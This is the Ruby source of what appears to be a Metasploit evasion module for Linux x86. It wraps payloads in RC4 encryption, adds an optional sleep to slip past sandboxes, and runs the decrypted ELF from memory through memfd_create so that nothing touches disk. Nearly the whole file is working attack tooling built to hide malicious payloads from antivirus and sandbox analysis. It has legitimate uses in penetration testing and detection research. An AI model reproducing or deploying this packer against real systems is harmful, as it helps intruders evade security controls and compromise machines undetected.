1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Evasion
7

8
  include Msf::Payload::Linux::X86::Rc4Decrypter
9
  include Msf::Payload::Linux::X86::ElfLoader
10
  include Msf::Payload::Linux::X86::SleepEvasion
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Linux RC4 Packer with In-Memory Execution (x86)',
17
        'Description' => %q{
18
          This evasion module packs Linux payloads using RC4 encryption
19
          and executes them from memory using memfd_create for fileless execution.
20

21
          The evasion module works on systems with Linux Kernel 3.17+ due to memfd_create support.
22

23
          Features:
24
          - RC4 encryption with configurable key size
25
          - Fileless execution via memfd_create
26
        },
27
        'Author' => ['Massimo Bertocchi'],
28
        'License' => MSF_LICENSE,
29
        'Platform' => 'linux',
30
        'Arch' => [ARCH_X86],
31
        'Targets' => [['Linux x86', {}]],
32
        'DefaultTarget' => 0
33
      )
34
    )
35

36
    register_options([
37
      OptString.new('FILENAME', [true, 'Output filename', 'payload.elf']),
38
      OptInt.new('SLEEP_TIME', [false, 'Sleep Time for Sandbox Evasion', 0]),
39
    ])
40
  end
41

42
  def run
43
    raw_payload = payload.encoded
44
    if raw_payload.blank?
45
      fail_with(Failure::BadConfig, 'Failed to generate payload')
46
    end
47

48
    elf_payload = Msf::Util::EXE.to_linux_x86_elf(framework, raw_payload)
49
    complete_loader = sleep_evasion(seconds: datastore['SLEEP_TIME']) + rc4_decrypter(data: (in_memory_load(elf_payload) + elf_payload))
50
    final_elf = Msf::Util::EXE.to_linux_x86_elf(framework, complete_loader)
51

52
    File.binwrite(datastore['FILENAME'], final_elf)
53
    File.chmod(0o755, datastore['FILENAME'])
54
  end
55
end
56

57